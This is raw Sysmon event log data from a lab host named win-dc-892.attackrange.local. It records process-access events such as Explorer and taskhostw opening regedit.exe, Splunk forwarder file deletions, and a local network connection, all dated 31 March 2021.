12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.235{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDEE37574F63380EAD76406CD6700F54,SHA256=0453B72DBBBE31B8D29D590C872DC1C99530065CD31AC85C5B39F317FA672C9A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 354300x800000000000000011106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.475{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53717-false10.0.1.12-8000- 23542300x800000000000000011105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.313{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B238AA1BB222869C7B1FC8163B4F7EDB,SHA256=F9A5201F9ADD06C13801861EA734CA577B364A04005D529FF4BE0E4607FB1C2D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 